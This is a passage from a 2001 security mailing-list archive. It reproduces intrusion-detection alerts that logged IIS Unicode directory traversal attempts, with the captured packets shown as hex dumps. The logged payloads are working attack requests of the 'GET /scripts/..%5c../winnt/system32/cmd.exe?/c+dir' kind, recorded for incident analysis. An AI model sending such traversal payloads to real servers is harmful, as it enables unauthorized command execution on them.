020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
----------------------------------------------------------------------------
--
#(2 - 23456) [2001-09-18 09:01:46]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=140 ID=7227 flags=0 offset=0 TTL=123 chksum=63598
TCP:  port=3206 -> dport: 80  flags=***AP*** seq=1772532327
      ack=741934640 off=5 res=0 win=65535 urp=0 chksum=50606
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E   ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F   0..Host: www..Co
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F         nnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23457) [2001-09-18 09:01:46]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=136 ID=7250 flags=0 offset=0 TTL=123 chksum=63579
TCP:  port=3214 -> dport: 80  flags=***AP*** seq=1772999286
      ack=741934650 off=5 res=0 win=65535 urp=0 chksum=944
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: Olle Segerdahl: "Concept Virus(CV) V.5 - Quick analysis update"
Previous message: Jason Giglio: "Re: CodeBlue finally hitting, or what?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:49:46 PDT